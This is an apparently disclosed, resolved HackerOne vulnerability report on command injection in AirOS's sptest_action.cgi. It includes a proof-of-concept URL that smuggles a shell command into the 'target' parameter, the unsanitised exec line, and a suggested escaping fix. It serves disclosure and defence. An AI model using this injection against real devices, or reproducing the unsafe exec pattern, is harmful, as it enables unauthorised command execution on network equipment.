Read-Only user can execute arbitraty shell commands on AirOS

Disclosed: 2016-08-05 09:36:35 By rbran To ui
Unknown
Vulnerability Details
On the last version of AirOS (including the 8.0 beta) is possible to a read-only user to inject shell commands. Is possible to exploit the vulnerability using the following URL (adjusting the `airosid` value to a valid session): ``` https://192.168.0.21/sptest_action.cgi?ticket=426&action=start&target=192.168.0.100%3Btouch%20/tmp/vulnerable%3B&port=80&airosid=30171452416bb910e94ce2f802d73b89&_=1456685928091 ``` The vulnerability happen in the 'sptest.inc:46', that don't sanitizes the user input. The Vulnerable code: ``` exec("echo " + $ticket + " init " + $target + " > /proc/net/spdtst/stctl", $lines, $res); ``` Possible mitigation: ``` exec("echo " + EscapeShellCmd($ticket) + " init " + EscapeShellCmd($target) + " > /proc/net/spdtst/stctl", $lines, $res); ```
Actions
View on HackerOne
Report Stats
  • Report ID: 119317
  • State: Closed
  • Substate: resolved
  • Upvotes: 17
Share this report